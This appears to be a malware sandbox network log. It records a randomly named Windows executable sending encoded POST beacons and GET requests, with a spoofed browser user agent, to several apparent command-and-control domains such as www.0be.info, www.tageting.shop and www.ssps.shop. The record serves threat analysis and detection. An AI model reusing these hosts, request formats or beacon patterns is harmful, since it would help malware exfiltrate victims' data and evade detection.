                                                                                9 | 192.168.2.8 | 49722 | 173.0.157.187 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:21.716492891 CET | 695 | OUT | POST /5m3m/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.0be.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.0be.info
                                                                                Referer: http://www.0be.info/5m3m/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=hcYoCLalClNIjcRnZ95NBk2FUB8Unezy7P5vyONoUJw4cHNeKaNguTTFTqOH8JnYeXC3gWqj6sPKOKw+JC1zkBWkT5frhST/yAd0SFucvd8VBhWfwhPpXkiQriYyeRdUeoqQ2nJ5lCfXNyoG6BscpCnLl+iL7sMUFGXYEftL9ReHjH2oE5Kml779CGMcx0t4Lja/axM=
                                                                                Nov 26, 2024 09:28:22.940148115 CET | 262 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:28:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, private
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 23V,VH(,JM0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                10 | 192.168.2.8 | 49723 | 173.0.157.187 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:24.373871088 CET | 715 | OUT | POST /5m3m/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.0be.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.0be.info
                                                                                Referer: http://www.0be.info/5m3m/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=hcYoCLalClNIj8BnaehNQ02GXB8Uo+y57PFvyP4zX7U4cmdeYOZgizTFL6OO4JnHeXPKgXmj6sbKOJk+Jz1wlRWmfZfluyT/yAd0SB+6vdkVBRmfwAPmJUiTmyYyUxdQeoqu2ihXlAnXN2sG5UADyynJ7OiaqvVAJRL0Z/ZV8RiDmxHCebCgm7TWCFkq0DwQRAKPEmaf5jgGoirupb9haq4CHK9S
                                                                                Nov 26, 2024 09:28:25.600883007 CET | 262 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:28:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, private
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 23V,VH(,JM0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                11 | 192.168.2.8 | 49724 | 173.0.157.187 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:27.030558109 CET | 1732 | OUT | POST /5m3m/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.0be.info
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.0be.info
                                                                                Referer: http://www.0be.info/5m3m/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 68 63 59 6f 43 4c 61 6c 43 6c 4e 49 6a 38 42 6e 61 65 68 4e 51 30 32 47 58 42 38 55 6f 2b 79 35 37 50 46 76 79 50 34 7a 58 37 63 34 63 57 42 65 4b 38 78 67 6a 7a 54 46 56 71 4f 4c 34 4a 6d 62 65 58 48 4f 67 58 62 63 36 75 6a 4b 50 70 34 2b 41 68 64 77 73 52 57 6d 58 35 66 6f 68 53 53 6e 79 45 41 63 53 46 69 36 76 64 6b 56 42 53 75 66 35 78 50 6d 4c 55 69 51 72 69 59 45 65 52 63 46 65 73 47 59 32 69 74 70 6b 77 48 58 4d 53 49 47 2f 6d 59 44 2b 79 6e 50 36 4f 6a 48 71 76 70 32 4a 56 54 65 5a 39 35 7a 38 53 79 44 6b 6e 36 55 47 70 57 43 6c 34 76 44 46 31 34 50 37 51 63 33 62 41 4f 50 62 6c 79 68 74 32 38 30 70 44 66 5a 39 63 6b 62 4e 75 56 56 58 75 49 2f 47 51 64 36 67 6e 43 51 6f 47 6f 4a 30 2f 6d 50 72 65 51 79 43 56 6c 79 61 35 43 78 51 65 4e 75 47 55 4d 45 57 53 4b 4e 42 53 79 70 63 67 57 74 6c 76 43 6f 47 68 5a 4c 78 72 41 4b 53 36 52 57 38 59 33 7a 4f 41 79 77 4e 30 4e 6d 74 55 68 45 64 6c 77 45 33 5a 32 6f 6c 47 6a 50 54 68 70 56 37 4c 78 34 45 59 76 5a 35 74 36 66 58 71 65 35 33 [TRUNCATED]
                                                                                Data Ascii: ynlT=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 [TRUNCATED]
                                                                                Nov 26, 2024 09:28:28.400685072 CET | 262 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:28:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, private
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 23V,VH(,JM0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                12 | 192.168.2.8 | 49725 | 173.0.157.187 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:29.682641983 CET | 448 | OUT | GET /5m3m/?ynlT=sewIB7u3B3NHgPpZQtRvAC2dQwElouqr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekxejaqvXrk67j38PQRuymLw6FTWN0hL2AlWAmiNidTQMGA==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.0be.info
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:28:31.005750895 CET | 217 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:28:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, private
                                                                                Data Raw: 66 0d 0a 4c 69 6e 6b 20 69 73 20 65 78 70 69 72 65 64 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: fLink is expired0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                13 | 192.168.2.8 | 49726 | 13.227.8.45 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:37.174638033 CET | 710 | OUT | POST /x43r/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.tageting.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.tageting.shop
                                                                                Referer: http://www.tageting.shop/x43r/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=t0ebswxTkvIQVeizjwCu4pL9mlPzNeTMJ0Z9axdxZVvL6zHfNpWjkt8nqCGInf71SzWgWzct8NiPz1P4jm8ejDV9z8rqibPjrvOoBD5meU5xkpHt18SJKNgUiH2A6s99jhx86tESibA+Ub8yUME+sx9A53SRJ1Cj2KjEdk7ENAG6V+cQ+yPHqMrTUNpzweQvMVGSCDQ=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                14 | 192.168.2.8 | 49727 | 13.227.8.45 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:40.097840071 CET | 730 | OUT | POST /x43r/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.tageting.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.tageting.shop
                                                                                Referer: http://www.tageting.shop/x43r/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=t0ebswxTkvIQU6ezkX+u+JKP61PzUOSFJ0d9a05hajfL7S3fMsijlt8niiGN6P7qSzbTWxIt8NmPz0/4j1UdhTVj/crov7PjrvOoBFUxeVRxnaftntSKUdgXlH2Asc95jhxe6so0iZ4+UaMyUdE9mx9C2XTdIHHs0rf2dizRSGDFZot6kQHBpMD4UOBF1pNHW2WicUG/uYZIe0Ds1bCNTgGw7tWG


                                                                                Session ID: 15 | Source IP: 192.168.2.8 | Source Port: 49728 | Destination IP: 13.227.8.45 | Destination Port: 80 | PID: 6504 | Process: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:42.767025948 CET | 1747 bytes | OUT | POST /x43r/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.tageting.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.tageting.shop
                                                                                Referer: http://www.tageting.shop/x43r/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 74 30 65 62 73 77 78 54 6b 76 49 51 55 36 65 7a 6b 58 2b 75 2b 4a 4b 50 36 31 50 7a 55 4f 53 46 4a 30 64 39 61 30 35 68 61 67 2f 4c 37 67 2f 66 4e 50 36 6a 2f 74 38 6e 73 43 47 4d 36 50 36 77 53 7a 43 37 57 78 55 39 38 50 75 50 38 32 33 34 7a 55 55 64 37 44 56 6a 69 4d 72 74 69 62 50 32 72 72 71 73 42 46 6b 78 65 56 52 78 6e 62 76 74 6b 38 53 4b 57 64 67 55 69 48 32 45 36 73 38 6b 6a 68 49 38 36 73 63 43 69 70 59 2b 55 36 63 79 62 50 63 39 71 78 39 63 36 33 53 41 49 47 36 73 30 6f 72 36 64 69 76 37 53 42 50 46 63 70 30 33 33 52 33 63 38 71 48 52 56 4d 46 75 35 4c 46 4b 58 46 43 4d 58 30 2b 79 6b 39 51 6c 65 6e 58 76 78 61 4b 43 4d 6e 4b 31 71 6f 33 59 69 36 72 5a 79 6b 59 56 33 56 74 4c 49 32 77 56 79 6f 65 5a 6c 54 54 72 67 78 57 6c 36 73 62 31 53 4f 64 4c 4f 79 61 6e 49 6b 2b 36 73 54 56 52 47 6d 41 63 52 61 6d 41 57 33 6a 72 4d 78 66 6d 70 6f 36 50 34 57 4a 50 4a 4b 79 31 61 67 55 44 4d 53 6d 4f 36 65 45 38 73 2b 2b 6f 74 4d 31 70 70 4b 39 4a 70 73 31 33 30 5a 4a 35 6b 78 4e 7a 52 [TRUNCATED]
                                                                                Data Ascii: ynlT=[TRUNCATED]


                                                                                Session ID: 16 | Source IP: 192.168.2.8 | Source Port: 49729 | Destination IP: 13.227.8.45 | Destination Port: 80 | PID: 6504 | Process: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:45.433423042 CET | 453 bytes | OUT | GET /x43r/?BZcp=FxLxsNCx3xt&ynlT=g227vAVjmek7Ve3OhSfqnYrPqVj7dvzdLiIhaitLUQPOyze4NP6q28gxignii/rObVyldh0Z2JuPzDHM7nQjiG1l2MLTtuTBkMOIHhIRbjJQu6+Ns/S/DI47tn6Dt4shhg== HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.tageting.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:28:47.196552992 CET | 1236 bytes | IN | HTTP/1.1 200 OK
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Date: Tue, 26 Nov 2024 08:28:46 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                Server: nginx
                                                                                Vary: Accept-Encoding
                                                                                P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
                                                                                Set-Cookie: IMWEBVSSID=h73o1dqlpkck6i93382v8sso1cirjrmcisn36a7uuhl51imjv3oam837hpdaj2oga84hjoarnq8mn10u4uob4p05ouhm37186gho2i0; path=/; domain=tageting.shop; HttpOnly
                                                                                Set-Cookie: al=KR; expires=Mon, 22-Sep-2025 08:28:46 GMT; Max-Age=25920000; path=/; domain=tageting.shop; HttpOnly
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                X-Cache: Miss from cloudfront
                                                                                Via: 1.1 0d8b4cbedd535224fcd064adb5292d3a.cloudfront.net (CloudFront)
                                                                                X-Amz-Cf-Pop: BAH53-C1
                                                                                X-Amz-Cf-Id: HoLEejbBupKikuSRc9ZKNvZg707zR0KpzsbnjNgwQt-hOCqr156x0g==
                                                                                Data Raw: 37 33 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 32 2e 34 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 66 61 66 61 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 42 34 38 35 39 3b 0a 09 09 09 66 6f 6e 74 2d 73 79 6e 74 68 65 73 69 73 3a 20 6e 6f 6e 65 3b 0a 09 09 09 74 [TRUNCATED]
                                                                                Data Ascii: 731<!DOCTYPE html><html><head><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script><style>body {background:#fafafa;color: #3B4859;font-synthesis: none;text-rendering: optimizeLegibility;-web
                                                                                Nov 26, 2024 09:28:47.196573973 CET | 1236 bytes | IN | Data Raw: 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 09 09 09 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 09 09 09 2d 6d 6f 7a 2d 66 6f
                                                                                Data Ascii: kit-font-smoothing: antialiased;-moz-osx-font-smoothing: grayscale;-moz-font-feature-settings: 'liga', 'kern';direction: ltr;line-height: 1.45;font-size:15px;}a {text-decoration: none;}section {font-size
                                                                                Nov 26, 2024 09:28:47.196588039 CET | 237 bytes | IN | Data Raw: 61 3e 0a 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 69 66 72 61 6d 65 20 6e 61 6d 65 3d 22 68 69 64 64 65 6e 5f 66 72 61 6d 65 22 20 69 64 3d 22 68 69 64 64 65 6e 5f 66 72 61 6d 65
                                                                                Data Ascii: a></div></div></div></section><iframe name="hidden_frame" id="hidden_frame" title="hidden frame" src="about:blank" style="position: absolute; left: -9999px; width: 1px; height: 1px; top:-9999px;"></iframe></body></html>0


                                                                                Session ID: 17 | Source IP: 192.168.2.8 | Source Port: 49730 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6504 | Process: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:01.206409931 CET | 698 bytes | OUT | POST /r99d/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.ssps.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.ssps.shop
                                                                                Referer: http://www.ssps.shop/r99d/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 70 75 69 66 67 67 4e 39 78 5a 34 41 31 34 69 46 37 46 33 35 31 56 49 32 76 35 77 41 42 2b 78 48 73 53 38 43 71 73 52 53 54 4f 52 46 47 76 53 51 63 43 49 34 6c 33 66 70 4e 43 72 4a 63 55 76 75 41 78 73 34 55 73 4b 6a 55 34 4e 53 4e 35 34 4a 4a 30 77 51 65 38 30 74 75 4e 4a 44 6b 46 4e 6e 33 70 63 4d 49 78 6d 71 71 54 36 52 31 43 55 33 30 43 6d 4d 77 45 4b 4e 6e 38 42 58 4e 56 75 51 75 4e 42 62 79 33 56 4b 4a 4a 35 4b 55 76 4c 45 79 65 37 77 39 6c 64 2f 4c 69 2f 62 70 34 36 43 50 4e 4a 73 42 57 64 34 4d 4d 36 61 44 4c 37 32 62 5a 61 56 42 76 38 30 36 55 7a 72 56 36 72 63 56 42 45 64 4d 76 4d 3d
                                                                                Data Ascii: ynlT=puifggN9xZ4A14iF7F351VI2v5wAB+xHsS8CqsRSTORFGvSQcCI4l3fpNCrJcUvuAxs4UsKjU4NSN54JJ0wQe80tuNJDkFNn3pcMIxmqqT6R1CU30CmMwEKNn8BXNVuQuNBby3VKJJ5KUvLEye7w9ld/Li/bp46CPNJsBWd4MM6aDL72bZaVBv806UzrV6rcVBEdMvM=


                                                                                Session ID: 18 | Source IP: 192.168.2.8 | Source Port: 49731 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6504 | Process: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:03.925929070 CET | 718 bytes | OUT | POST /r99d/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.ssps.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.ssps.shop
                                                                                Referer: http://www.ssps.shop/r99d/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 70 75 69 66 67 67 4e 39 78 5a 34 41 6e 4a 53 46 72 56 4c 35 39 56 49 31 71 35 77 41 49 65 78 44 73 53 77 43 71 70 31 38 51 34 70 46 42 4f 69 51 64 48 30 34 6b 33 66 70 56 53 72 49 59 55 75 73 41 78 77 76 55 75 65 6a 55 37 78 53 4e 39 6f 4a 4a 48 49 54 63 73 30 76 37 64 4a 42 35 56 4e 6e 33 70 63 4d 49 79 61 51 71 54 79 52 30 79 6b 33 31 6a 6d 4c 75 30 4b 4d 33 73 42 58 63 46 75 55 75 4e 42 74 79 7a 4e 77 4a 4d 39 4b 55 72 50 45 79 4c 50 33 7a 56 63 30 46 43 2f 51 76 71 66 79 42 76 6c 66 64 67 46 65 45 75 71 45 4c 64 4b 63 42 37 53 54 43 76 55 66 36 58 62 64 51 4e 32 30 50 69 55 74 53 34 59 4e 51 53 2b 54 57 4e 37 58 46 48 4d 67 49 53 79 5a 4a 63 65 58
                                                                                Data Ascii: ynlT=puifggN9xZ4AnJSFrVL59VI1q5wAIexDsSwCqp18Q4pFBOiQdH04k3fpVSrIYUusAxwvUuejU7xSN9oJJHITcs0v7dJB5VNn3pcMIyaQqTyR0yk31jmLu0KM3sBXcFuUuNBtyzNwJM9KUrPEyLP3zVc0FC/QvqfyBvlfdgFeEuqELdKcB7STCvUf6XbdQN20PiUtS4YNQS+TWN7XFHMgISyZJceX


                                                                                Session ID: 19 | Source IP: 192.168.2.8 | Source Port: 49732 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6504 | Process: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:06.592339039 CET | 1735 bytes | OUT | POST /r99d/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.ssps.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.ssps.shop
                                                                                Referer: http://www.ssps.shop/r99d/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 70 75 69 66 67 67 4e 39 78 5a 34 41 6e 4a 53 46 72 56 4c 35 39 56 49 31 71 35 77 41 49 65 78 44 73 53 77 43 71 70 31 38 51 34 68 46 42 34 57 51 63 6b 63 34 2b 33 66 70 5a 79 72 46 59 55 75 74 41 78 6f 6a 55 75 43 5a 55 39 39 53 4d 66 67 4a 50 79 6b 54 57 73 30 76 35 64 4a 63 6b 46 4e 79 33 70 73 49 49 78 79 51 71 54 79 52 30 30 6f 33 38 53 6d 4c 73 30 4b 4e 6e 38 42 54 4e 56 75 73 75 4a 73 59 79 7a 59 4e 4a 59 4a 4b 55 4c 66 45 7a 39 6a 33 78 31 63 32 43 43 2b 51 76 71 6a 74 42 76 35 54 64 67 5a 6b 45 73 36 45 49 34 37 66 56 34 36 34 55 39 56 71 31 41 4c 45 63 50 43 4f 4d 79 77 43 59 4b 45 44 61 6b 36 37 5a 39 4c 6a 49 58 70 5a 56 7a 71 50 46 4b 58 30 6f 4b 4d 4f 45 56 70 72 41 65 53 73 2f 7a 33 4f 6f 61 59 72 6a 62 34 50 31 46 51 41 4e 4a 32 6f 4d 31 47 2b 6c 53 48 63 4a 53 69 6d 79 55 49 54 35 44 37 44 44 74 4c 65 59 4e 54 2f 54 46 6e 58 33 73 30 43 2f 52 30 6d 52 55 4b 75 43 4f 31 76 79 6c 4b 42 58 31 51 78 4d 57 6f 41 30 68 70 6b 35 56 37 6c 6f 61 4f 56 41 32 78 36 7a 50 31 64 4c [TRUNCATED]
